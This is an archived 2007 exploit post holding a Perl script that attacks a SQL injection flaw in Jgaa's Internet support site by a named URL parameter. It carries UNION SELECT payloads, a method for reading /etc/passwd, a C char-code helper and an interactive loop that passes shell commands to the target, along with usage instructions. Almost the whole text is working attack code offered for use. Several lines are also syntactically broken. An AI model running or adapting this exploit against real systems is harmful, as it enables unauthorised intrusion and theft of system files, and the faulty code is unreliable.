jgaa-sql.txt
Posted on 25 July 2007
#!/usr/bin/perl #You can get admin hash,or acces the pass file from the *NIx #with the generated strings with the generator.c program #you have to put in sql specific comands,my example is for #tables and *NIX pass #exploit tested on winxp sp2 # #include<stdio.h> # #include<stdlib.h> # #include<string.h> # int main() # { char st[1024]; # int le; # printf("Input : "); # gets(st); # for(le=0;le<strlen(st);le++) # { printf("%d,",st[le]); # } # system("pause"); # return 0; # } #101,116,99,47,112,97,115,115,119,100 = /etc/passwd #If we would do this : #http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/* #we create 8 tables ,to see the result type : #-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/* print "......Start....... "; print "................. "; print ". fl0 fl0w . "; print ". found by fl0w fl0w "; print ". c0ded by fl0 fl0w "; print ".......Email me at flo[underscore]fl0w[underscore]supremacy[dot]com "; print "................. "; use LWP::UserAgent; $site=@ARGV[0]; $shells=@ARGV[1]; $shellcmd=@ARGV[2]; if($site!~/http:/// || $site!~/http:/// || !$shells) { routine() } header(); while() { print"[shell] $"; while(<STDIN>) { $cmd=$_; chomp($cmd); $sploit=LWP::UserAgent->new() or die; $requesting=HTTP::Request->new(GET=>$site.'/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*'.$shells.'?&'.$shellcmd.'='.$cmd) or die" NOT CONNECTED "; $re=$sploit->request(requesting); $i=$re->content; $i=~tr/[ ]/[ê]/; if(!$cmd) { print "Enter a command "; $i=""; } elsif(i=~/failed to open:HTTP request failed!/ || $i=~/:cannot execute the command in <b>/ ) { print " Could NOT connect to cmd from host "; exit; } elsif($i=~/^<br./>.<b>WARNING/) { print " Invalid command "; }; if($i=~/(.+)<br./>.<b>WARNING.(.+)<br./>.<b>WARNING/) { $last=$1; $last=~tr/[&234;]/[ ]/; print " $last "; last; } else { print "[shell] $"; } } } last; sub header() { print q { ================================================================================================================================================================ MSQL injection -file disclosure in Jgaa's Internet PoC:http://support.jgaa.com Demo:http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/* ================================================================================================================================================================ } } sub routine() { header(); print q { ====================================================================================================== USAGE: perl exploit.pl <http://site.com> EXAMPLE: perl [localhost][path] exploit.pl [target] ====================================================================================================== }; exit(); } --------------------------------- Yahoo! oneSearch: Finally, mobile search that gives answers, not web links.
